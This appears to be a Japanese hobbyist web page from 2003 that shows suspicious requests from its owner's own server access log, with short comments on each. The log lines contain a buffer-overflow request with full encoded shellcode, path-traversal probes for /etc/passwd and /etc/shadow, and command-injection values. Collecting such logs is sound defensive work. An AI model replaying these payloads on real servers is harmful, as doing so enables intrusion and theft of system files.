自前の web サーバに対する妖しいアクセスをウオッチしてみました! 当然のことながら、都合の悪いモノは非公開としますのであしからず。 簡易ログビューワも作りました。ここを参照してください。 |
210.142.44.xx - - [12/Jul/2003:18:21:27 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u96d2%u77e5%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0\x8d}-\x90\x90\x90\x8b\xf7f\xb8H\x063\xc9f\x8b\xc8\xb4\x99\xfc\xac2\xc4\xaa\xe2\xfa\x14$\xec\x9f\x99\x99e\xaaP(\xb9)\xbdk7_\xdef\x99q\x94\x9d\x99\x99q\x16\x9d\x99\x99q\xd7\x9b\x99\x99\x10\x1c\xda\x9c\x99\x99q\xc8\x9b\x99\x99q\xbd\x9a\x99\x99\x10\x1c\xde\x9c\x99\x99q'\x98\x99\x99\x10\x1c\xd6\x9c\x99\x99\x12\x1c\xde\x9c\x99\x99q\xe6\x9b\x99\x99\x10\x1c\xd2\x9c\x99\x99q\xc7\x99\x99\x99q\b\x99\x99\x99\x1aa\x99\xedy\x12\x1c\xd2\x9c\x99\x99\xc9f\x0c\x94\x9f\x99\x99\x12\x1c\xde\x9c\x99\x99\xc9f\x0c\x94\x9f\x99\x99\x12\x1c\xb6\x9c\x99\x99\xc9f\x0c\x1f\x9c\x99\x99\x12\x1c\xa2\x9c\x99\x99\xc9f\x0c\x1f\x9c\x99\x99!\x99\x99\x99\x99\xc9\x12\x1c\xd6\x9c\x99\x99\xc9f\x0c\\\x9c\x99\x99!\x99\x99\x99\x99\xc9f\x0cO\x9c\x99\x99Z\x12\x1c\xd2\x9c\x99\x99\xf3\x99\xf3\x80\x14\x1c\x9a\x98\x99\x99\xc9\x12\x1c\xd2\x9c\x99\x99\xc9f\x0c\x9a\x9f\x99\x99Z\x94\x93\xce\xf0\xf7\xf7\xed\xd8\xec\xed\xf6\xd8\xed\xed\xf8\xfa\xf2\xb9\xcf\xab\xa9\x94\x93\x94\x93\xf1\t\x99\x99\x99f\x0c&\x9c\x99\x99\x12\x1c\xb6\x9c\x99\x99q_\x99\x99\x99\x1aaf\x96\x1d/\x99\x99\x99\x1aa\x99\xed\xce\t\t\t\t\xf3\x99\x14\x1c\xa6\x9c\x99\x99\xc9\xf1\x99\x9d\x99\x99\x12\x1c\xda\x9c\x99\x99\xc9\x12\x1c\xb6\x9c\x99\x99\xc9f\x0c/\x9c\x99\x99\x1aa\x99\x96\x1d\x1b\x99\x99\x99\xf3\x99\x12\x1c\xa6\x9c\x99\x99\xc9\x12\x1c\xda\x9c\x99\x99\xc9\x12\x1c\xd2\x9c\x99\x99\xc9f\x0c\x9a\x9f\x99\x99\x1aaf\xed\xfd\t\t\t\tr\x1c\xf3\x99\xf1\x99\x9d\x99\x99\x12\x1c\xda\x9c\x99\x99\xc9\x12\x1c\xd2\x9c\x99\x99\xc9f\x0c\x91\x9f\x99\x99\x1aa\x99\xed\xa7\t\t\t\t\x1aaf\xed\xac\t\t\t\t\xaaB\xca\x14\x04\xa6\x9c\x99\x99\xca\xc9\x12\x1c\xda\x9c\x99\x99\xc9\x12\x1c\xa2\x9c\x99\x99\xc9f\x0c5\x9c\x99\x99\x1aa\x99\xed\x90\t\t\t\tp\xb2fff\xaaY\xd1Z\xaaYZ\xaaB\xca\x14\x04\xbd\x9b\x99\x99\xca\xaaB\xca\xca\xca\xc9f\x0c\v\x9c\x99\x99\x1aa\x99\xed\x92\t\t\t\t\x12\x1c\xbd\x9b\x99\x99Z!ffffZ\x99\x99\x99\x99\x12\x1c\xda\x9c\x99\x99^\x99\xdd\x99\x99\x99\xc9f\x0c\xfe\x9c\x99\x99\x12\x04\xda\x9c\x99\x99\x12\x1c\xaa\x9c\x99\x99\x10\xda\xd9\x10\xda\xa5\x12\x1c\xae\x9c\x99\x99\x10\xda\xa1!\x98\x98\x99\x99\x10\xda\xb5\xca\xca\xaaY\xc9\xc9\xc9\xd9\xc9\xd1\xc9\xc9\x14\x1c\xec\x9f\x99\x99\xc9\xaaY\xc9f\x0c\xee\x9c\x99\x99\x12\x1c\xaa\x9c\x99\x99\xc9f\x0c\x1f\x9c\x99\x99\x12\x1c\xae\x9c\x99\x99\xc9f\x0c\x1f\x9c\x99\x99\x12\x1c\xda\x9c\x99\x99\x12\x99Z\xf1\x99\x9d\x99\x99\xf3\xd9f\x0c9\x9c\x99\x99Z\xaaY\xc9\x14\x1cw\x9b\x99\x99^\x99\x95\x99\x99\x99\xc9\x14\x1c\xaa\x9c\x99\x99\xc9\x14\x1c\xb6\x9c\x99\x99\xc9f\x0c\xc5\x9c\x99\x99\xaaY\xc9\x14\x1cw\x9b\x99\x99\xc9\x14\x1c\xa2\x9c\x99\x99\xc9\x14\x1c\xae\x9c\x99\x99\xc9f\x0c\xc5\x9c\x99\x99Z\x99\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99\xc9\x14\x04\xb8\x9a\x99\x99^\x9a\x89\x99\x99\x99\xca\x14\x04\xdb\x9d\x99\x99\xca\xc9f\x0ce\x9c\x99\x99\x12A\x1aa\x99\xc1\xe5E\x12ZZ\x89\x99\x99\x99\xf3\x8a\x14\x1c\xf6\x9a\x99\x99\xc9f\x0c\xbd\x9f\x99\x99\x14\x1c\xf6\x9a\x99\x99\xc9f\x0c\xa9\x9f\x99\x99\x1aa\x99\xed\xbb\t\t\t\t\x12\xe9\x95\x12ge4\x1aa\x99\xed\x8a\t\t\t\t\x12\x99\xa5\x93\xedi\xa5Y\xedu\xa55\xedqZ\x12n4\x12\x99Z\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x12\x1c\xda\x9c\x99\x99\xc9\xf3\x9bf\x0c\x80\x9f\x99\x99\xf3\x99\xf3\x98\xf3\x9bf\x0cp\x9c\x99\x99\x1aaf\x96\x1d\x01\x99\x99\x99\x10\x1c\xde\x9c\x99\x99\x14\x04\xa6\x9c\x99\x99^\x9a\x98\x99\x99\x99\xf3\x9d\xca\xf3\x9d\xf1ff\x99\x99\xc9f\x0c\xa7\x9f\x99\x99\x1aa\x99\xec\xe9\t\t\t\t\xff\x12\x1c\xf6\x9f\x99\x99\xff\x10\x1c\xdd\x9d\x99\x99\x12\x1c\xe8\x9f\x99\x99\x10\x1c\xdf\x9d\x99\x99\x1aaf\xec\x96\t\t\t\tq\xb3fff\x10\x1c\xdf\x9d\x99\x99\x12\x1c\xde\x9c\x99\x99\xf3\x89\x14\x04\xdb\x9d\x99\x99\xca\xc9f\x0ci\x9c\x99\x99\x1aa\x99\xec\xba\t\t\t\t\xf3\x9c\x12\x1c\xde\x9c\x99\x99\xc9f\x0cl\x9c\x99\x99\x1aa\x99\xec\x92\t\t\t\t\x12\x1c\xde\x9c\x99\x99Z\xaaYZ\x9b\x99\x99\xfa\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99!\x99\x99h\xee\x18\xa1\xd4\xc3\t\x99\xed\x9e\t\t\t\t\xd1rh\x12A\x12\xea\xa5\x9aj\x12\xef\xe1\x9aj\x12\xe7\xb9\x9ab\x12\xd7\x8d\xaaK\xcf\xce\xc8\x12\xa6\x9ab\x14,\xc1\x9f\x99\x99\xaaP(\x9ej\xff>\xed\x95\t\t\t\t\xc0\xc6\x1a^\x9d\xdb{F\xc0\xc6\xc7\x12S\x12\xdf\xbd\x9aZHx\x9aX\xaaP\xff\x12\x91\x12\xdf\x85\x9aZXx\x9b\x9aX\x12\x99\x9aZ\x10\x1c\xf2\x9f\x99\x99\x12Z\x14\x04\xd2\x9f\x99\x99q\xc9\x99\x99\x99\x10\x1c\xfe\x9f\x99\x99Z\x14$\xca\x9c\x99\x99\x12^\xceq\xb6\x99\x99\x99\xc6\xc9\xabY\xaaPnHek7\xc1\x19\xa6\x99\xed\x8e\t\t\t\t\xc9\xce\x12Fq\x84\x99\x99\x99\xc6\x10\x9e\xc1\xde\xde\xde\xder@\xde\x19\xa6\x99\xecSZ\xca\x14\x04\xfe\x9f\x99\x99\xc9f\x8a\xc2Z\xce\x14$\xf2\x9f\x99\x99\xca\xc9f\x8e\xc6Z\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xcd\xfc\xeb\xf4\xf0\xf7\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99\x99\xce\xca\xab\xc6\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xce\xca\xd8\xca\xed\xf8\xeb\xed\xec\xe9\x99\xfe\xfc\xed\xf1\xf6\xea\xed\xf7\xf8\xf4\xfc\x99\xfe\xfc\xed\xf1\xf6\xea\xed\xfb\xe0\xf7\xf8\xf4\xfc\x99\xea\xfc\xed\xea\xf6\xfa\xf2\xf6\xe9\xed\x99\x99\x99\xd5\xf6\xf8\xfd\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd\xeb\xfc\xea\xea\x99\xea\xeb\x7f\xee\xa8\xe9\x7f\xee\x99\xfa\xa4\xea\xef\x91cmd.exe$ HTTP/1.1" 400 376初めて確認したタイプです。1行が非常に長いですな。これが何度か続けてきてます。
61.177.220.xxx - - [28/Mar/2003:17:04:47 +0900] "OPTIONS * HTTP/1.0" 200 - 219.242.81.xxx - - [08/Apr/2003:17:23:51 +0900] "OPTIONS * HTTP/1.0" 200 -なにがしかのセキュリティホールを狙ったのか、はたまた何かの探りを入れてきてるのか。
211.91.254.xxx - - [10/Apr/2003:20:57:24 +0900] "GET / HTTP/1.1" 200 6471 211.91.254.xxx - - [10/Apr/2003:20:57:24 +0900] "HEAD /qweiop43809442fsfjflr.html HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:25 +0900] "GET / HTTP/1.1" 200 6471 211.91.254.xxx - - [10/Apr/2003:20:57:26 +0900] "HEAD /ifx/?LO=../../../etc/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:26 +0900] "HEAD /../../etc/passwd HTTP/1.1" 400 0 211.91.254.xxx - - [10/Apr/2003:20:57:26 +0900] "HEAD /../../../../../etc/passwd HTTP/1.1" 400 0 211.91.254.xxx - - [10/Apr/2003:20:57:26 +0900] "HEAD /../../../etc/passwd HTTP/1.1" 400 0 211.91.254.xxx - - [10/Apr/2003:20:57:30 +0900] "HEAD /../../passwd HTTP/1.1" 400 0 211.91.254.xxx - - [10/Apr/2003:20:57:40 +0900] "HEAD /../../shadow HTTP/1.1" 400 0 211.91.254.xxx - - [10/Apr/2003:20:57:40 +0900] "HEAD /../../passwd HTTP/1.1" 400 0 211.91.254.xxx - - [10/Apr/2003:20:57:47 +0900] "HEAD /cgi/ HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:48 +0900] "HEAD /admin-serv/config/admpw HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:48 +0900] "HEAD /admin-serv/config/admpw HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:49 +0900] "HEAD /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:53 +0900] "HEAD /whois_raw.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:56 +0900] "HEAD /web_store.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:58 +0900] "OPTIONS / HTTP/1.1" 200 - 211.91.254.xxx - - [10/Apr/2003:20:57:58 +0900] "HEAD /whois_raw.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:59 +0900] "HEAD /usr/local/apache/share/htdocs/.htaccess HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:57:59 +0900] "HEAD /userreg.cgi?cmd=insert=eng&tnum=3&fld1=test999%0acat>/etc/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:00 +0900] "HEAD /userreg.cgi?cmd=insert=eng&tnum=3&fld1=test999%0acat>/etc/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:01 +0900] "HEAD /root HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:02 +0900] "HEAD /pw/storemgr.pw HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:05 +0900] "HEAD /pw/storemgr.pw HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:05 +0900] "GET /NULL.printer HTTP/1.1" 404 295 211.91.254.xxx - - [10/Apr/2003:20:58:09 +0900] "HEAD /publisher/ HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:09 +0900] "HEAD /PSUser/PSCOErrPage.htm HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:19 +0900] "HEAD /piranha/secure/passwd.php3 HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:23 +0900] "HEAD /ping HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:24 +0900] "HEAD /photoads/cgi-bin/env.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:24 +0900] "HEAD /photoads/ads_data.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:27 +0900] "HEAD /pfdispaly.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:29 +0900] "HEAD /PDG_Cart/shopper.conf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:44 +0900] "HEAD /PDG_Cart/shopper.conf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:51 +0900] "HEAD /orders/orders.txt HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:52 +0900] "HEAD /Orders/order.log HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:52 +0900] "HEAD /Orders/order.log HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:54 +0900] "HEAD /orders/order.log HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:54 +0900] "HEAD /orders/mountain.cfg HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:58:59 +0900] "HEAD /PDG_Cart/order.log HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:05 +0900] "HEAD /orders/checks.txt HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:13 +0900] "HEAD /orders/checks.txt HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:13 +0900] "HEAD /null.htw HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:14 +0900] "HEAD /null.htw HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:15 +0900] "HEAD /ncl_items.html HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:18 +0900] "HEAD /names.nsf/Open HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:19 +0900] "HEAD /names.nsf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:20 +0900] "HEAD /manage/cgi/cgiproc HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:21 +0900] "HEAD /mall_log_files/order.log HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:21 +0900] "HEAD /mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:22 +0900] "HEAD /logs HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:23 +0900] "HEAD /logs HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:31 +0900] "HEAD /log.nsf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:32 +0900] "HEAD /log HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:32 +0900] "HEAD /log.nsf/ HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:43 +0900] "HEAD /ews/ews/architext_query.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:49 +0900] "HEAD /ews/ews/architext_query.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:20:59:57 +0900] "HEAD /domlog.nsf/ HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:03 +0900] "HEAD /domlog.nsf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:23 +0900] "HEAD /domcfg.nsf/ HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:23 +0900] "HEAD /domcfg.nsf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:23 +0900] "HEAD /domcfg.nsf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:27 +0900] "HEAD /database.nsf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:34 +0900] "HEAD /cool-logs/mylog.html HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:41 +0900] "HEAD /cool-logs/mlog.html HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:46 +0900] "HEAD /cgi-src HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:48 +0900] "HEAD /cgi-bin/zsh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:49 +0900] "HEAD /cgi-local HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:51 +0900] "HEAD /cgi-bin/www-sql HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:52 +0900] "HEAD /cgi-bin/wwwboard.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:00:53 +0900] "HEAD /cgi-bin/wwwboard.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:01:07 +0900] "HEAD /cgi-bin/wwwadmin.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:01:09 +0900] "HEAD /cgi-bin/wwwadmin.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:01:15 +0900] "HEAD /cgi-bin/wrap.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:01:29 +0900] "HEAD /cgi-bin/wrap HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:01:41 +0900] "HEAD /cgi-Bin/wrap HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:01:41 +0900] "HEAD /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:01:55 +0900] "HEAD /cgi-bin/webwho.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:01:56 +0900] "HEAD /cgi-bin/webwho.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:03 +0900] "HEAD /cgi-bin/websendmail HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:06 +0900] "HEAD /cgi-bin/webmap.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:11 +0900] "HEAD /cgi-bin/webgais HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:12 +0900] "HEAD /Cgi-Bin/webdist.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:14 +0900] "HEAD /Cgi-Bin/webdist.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:19 +0900] "HEAD /cgi-bin/webdist.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:19 +0900] "HEAD /cgi-bin/webbbs.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:23 +0900] "HEAD /cgi-bin/w3tvars.pm HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:23 +0900] "HEAD /cgi-bin/w3-msql/ HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:23 +0900] "HEAD /cgi-bin/w3tvars.pm HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:38 +0900] "HEAD /cgi-bin/w3-msql HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:48 +0900] "HEAD /Cgi-Bin/view-source HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:52 +0900] "HEAD /Cgi-Bin/view-source HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:52 +0900] "HEAD /cgi-bin/userfile.dat HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:54 +0900] "HEAD /cgi-bin/user.log HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:55 +0900] "HEAD /cgi-bin/user.dat HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:57 +0900] "HEAD /cgi-bin/uptime HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:58 +0900] "HEAD /cgi-bin/upload.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:02:58 +0900] "HEAD /cgi-bin/upload.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:01 +0900] "HEAD /cgi-bin/unlg1.1 HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:09 +0900] "HEAD /cgi-bin/UltraBoard.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:10 +0900] "HEAD /cgi-bin/UltraBoard.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:12 +0900] "HEAD /cgi-bin/tpgnrock HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:13 +0900] "HEAD /cgi-bin/textcounter.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:14 +0900] "HEAD /cgi-bin/textcounter.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:19 +0900] "HEAD /cgi-bin/test-cgi?* HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:20 +0900] "HEAD /Cgi-Bin/test-cgi/* HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:32 +0900] "HEAD /cgi-bin/test-cgi.tcl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:34 +0900] "HEAD /Cgi-Bin/testcgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:36 +0900] "HEAD /cgi-bin/test-cgi.tcl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:37 +0900] "HEAD /cgi-bin/tcsh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:40 +0900] "HEAD /Cgi-Bin/tcsh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:41 +0900] "HEAD /cgi-bin/survey.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:41 +0900] "HEAD /cgi-bin/survey.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:03:45 +0900] "HEAD /Cgi-Bin/test.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:01 +0900] "HEAD /cgi-bin/status.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:03 +0900] "HEAD /cgi-bin/status.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:12 +0900] "HEAD /cgi-bin/shop.cgi?page=../../../../etc/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:14 +0900] "HEAD /cgi-bin/shop.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:14 +0900] "HEAD /cgi-bin/shop.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:14 +0900] "HEAD /Cgi-Bin/sojourn.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:14 +0900] "HEAD /cgi-bin/sh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:19 +0900] "HEAD /cgi-bin/settings.cfg HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:21 +0900] "HEAD /Cgi-Bin/search.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:22 +0900] "HEAD /Cgi-Bin/search.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:24 +0900] "HEAD /cgi-bin/search.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:28 +0900] "HEAD /cgi-bin/settings.cfg HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:34 +0900] "HEAD /cgi-bin/rwwwshell.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:35 +0900] "HEAD /cgi-bin/rsh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:35 +0900] "HEAD /cgi-bin/rpm_query HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:41 +0900] "HEAD /cgi-bin/rksh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:52 +0900] "HEAD /cgi-bin/responder.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:54 +0900] "HEAD /cgi-bin/responder HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:54 +0900] "HEAD /cgi-bin/redirect HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:56 +0900] "HEAD /cgi-bin/process_bug.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:57 +0900] "HEAD /cgi-bin/printenv HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:57 +0900] "HEAD /cgi-bin/post-query HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:04:59 +0900] "HEAD /cgi-bin/query HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:07 +0900] "HEAD /cgi-bin/postcard.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:08 +0900] "HEAD /cgi-bin/plusmail HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:08 +0900] "HEAD /cgi-bin/plusmail HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:15 +0900] "HEAD /cgi-bin/phpscan HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:16 +0900] "HEAD /cgi-bin/php.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:28 +0900] "HEAD /cgi-bin/php HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:32 +0900] "HEAD /cgi-bin/phf.pp HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:37 +0900] "HEAD /Cgi-Bin/phf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:38 +0900] "HEAD 